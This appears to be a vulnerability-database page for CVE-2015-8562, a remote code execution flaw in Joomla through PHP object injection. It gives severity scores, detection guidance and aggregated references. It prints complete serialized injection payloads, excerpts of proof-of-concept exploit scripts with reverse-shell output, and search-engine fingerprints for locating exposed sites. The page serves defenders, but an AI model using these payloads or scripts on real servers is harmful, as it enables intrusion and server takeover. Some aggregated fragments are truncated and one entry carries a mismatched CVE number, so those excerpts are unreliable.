CVE-2015-8562
published 2015-12-16CVE-2015-8562: Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent…
PriorityP279high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
98.28%
99.9th percentile
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.
Affected
95 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
Detection & IOCsextracted from sources · hover to see the quote
other}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";↗
ua123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}𝌆
- →Detect exploit attempts by inspecting the HTTP User-Agent header for the PHP object injection serialized payload prefix '}__test|O:21:"JDatabaseDriverMysqli"'
- →The exploit terminates the serialized payload with the UTF-8 multibyte sequence \xf0\xfd\xfd\xfd to truncate session data stored in the database; detect this byte sequence in HTTP headers ↗
- →Some PoC variants deliver the payload via the X-Forwarded-For header instead of User-Agent; monitor both headers for serialized PHP object strings ↗
- →The exploit uses 'assert' as the cache_name_function within the serialized object to achieve code execution; look for the string 'cache_name_function";s:6:"assert"' in HTTP header values ↗
- →Presence of dropped file /tmp/newhnewh.py on a Joomla server indicates successful exploitation via the reverse shell stage of the CVE-2015-8562 PoC ↗
- →Exploitation requires PHP versions before 5.4.45, 5.5.29, or 5.6.13; correlate vulnerable PHP version with Joomla detections to prioritize alerts ↗
- →Shodan/FOFA fingerprints for exposed Joomla instances: search for http.html:"joomla! - open source content management" or body="joomla! - open source content management"
- ·The exploit only works against PHP versions before 5.4.45, 5.5.29, or 5.6.13; patched PHP versions stop deserialisation on the first error, preventing exploitation even on unpatched Joomla ↗
- ·The PHP patch was backported into specific Ubuntu and Debian package versions (Ubuntu: 5.5.9+dfsg-1ubuntu4.13 / 5.3.10-1ubuntu3.20; Debian: 5.4.45-0+deb7u1); systems running these distro packages may be protected at the PHP level even without a Joomla upgrade ↗
- ·The vulnerability affects all Joomla versions from 1.5.0 through 3.4.5; the attack vector is the session table in the database where user-supplied headers are stored, and the payload executes when the session is read back ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pccq-v233-rx3q: Joomla! 1
ghsa_unreviewed·2022-05-14
CVE-2015-8562 [HIGH] CWE-20 GHSA-pccq-v233-rx3q: Joomla! 1
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.
VulnCheck
Joomla! Joomla! Improper Input Validation
vulncheck·2015·CVSS 7.5
CVE-2015-8562 [HIGH] Joomla! Joomla! Improper Input Validation
Joomla! Joomla! Improper Input Validation
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.
Affected: Joomla! Joomla!
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2015-8562; https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities--exploits--and-malware-driving-attack-campaigns-in-july-2019; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://go.catonetworks.com/rs/245-RJK-441/images/Security%20Quarterly%20Report.pdf; h
No detection rules found.
Exploit-DB
Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution
exploitdb·2015-12-18·CVSS 7.5
CVE-2015-8566 [HIGH] Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution
Joomla! 1.5
[+] Spawning reverse shell....
Listening on [0.0.0.0] (family 0, port 4444)
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/$
'''
import requests
import subprocess
import argparse
import sys
import base64
# Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com)
def get_url(url, user_agent):
headers = {
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests
'x-forwarded-for': user_agent # X-Forwarded-For header instead of UA
}
cookies = requests.get(url,headers=headers).cookies
for _ in range(3):
response = requests.get(url, headers=headers
Exploit-DB
Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution
exploitdb·2015-12-15
CVE-2015-8562 Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution
Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution
---
'''
Simple PoC for Joomla Object Injection.
Gary @ Sec-1 ltd
http://www.sec-1.com/
'''
import requests # easy_install requests
def get_url(url, user_agent):
headers = {
'User-Agent': user_agent
}
cookies = requests.get(url,headers=headers).cookies
for _ in range(3):
response = requests.get(url, headers=headers,cookies=cookies)
return response
def php_str_noquotes(data):
"Convert string to chr(xx).chr(xx) for use in php"
encoded = ""
for char in data:
encoded += "chr({0}).".format(ord(char))
return encoded[:-1]
def generate_payload(php_payload):
php_payload = "eval({0})".format(php_str_noquotes(php_payload))
terminate = '\xf0\xfd\xfd\xfd';
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:
Nuclei
Joomla HTTP Header Unauthenticated - Remote Code Execution
nuclei·CVSS 7.5
CVE-2015-8562 [HIGH] Joomla HTTP Header Unauthenticated - Remote Code Execution
Joomla HTTP Header Unauthenticated - Remote Code Execution
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015
Template:
id: CVE-2015-8562
info:
name: Joomla HTTP Header Unauthenticated - Remote Code Execution
author: kairos-hk,bolkv,n0ming,RoughBoy0723
description: |
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015
impact: |
Attackers can execute arbitrary PHP code on the server through PHP object injection, leading to complete server compromise and potential data breach.
r
Metasploit
Joomla HTTP Header Unauthenticated Remote Code Execution
metasploit
Joomla HTTP Header Unauthenticated Remote Code Execution
Joomla HTTP Header Unauthenticated Remote Code Execution
Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it's possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
http://packetstormsecurity.com/files/134949/Joomla-HTTP-Header-Unauthenticated-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/135100/Joomla-3.4.5-Object-Injection.htmlhttp://www.rapid7.com/db/modules/exploit/multi/http/joomla_http_header_rcehttp://www.securityfocus.com/archive/1/537219/100/0/threadedhttp://www.securityfocus.com/bid/79195https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.htmlhttps://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.htmlhttps://www.exploit-db.com/exploits/38977/https://www.exploit-db.com/exploits/39033/http://packetstormsecurity.com/files/134949/Joomla-HTTP-Header-Unauthenticated-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/135100/Joomla-3.4.5-Object-Injection.htmlhttp://www.rapid7.com/db/modules/exploit/multi/http/joomla_http_header_rcehttp://www.securityfocus.com/archive/1/537219/100/0/threadedhttp://www.securityfocus.com/bid/79195https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.htmlhttps://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.htmlhttps://www.exploit-db.com/exploits/38977/https://www.exploit-db.com/exploits/39033/
2015-12-16
Published
Exploited in the wild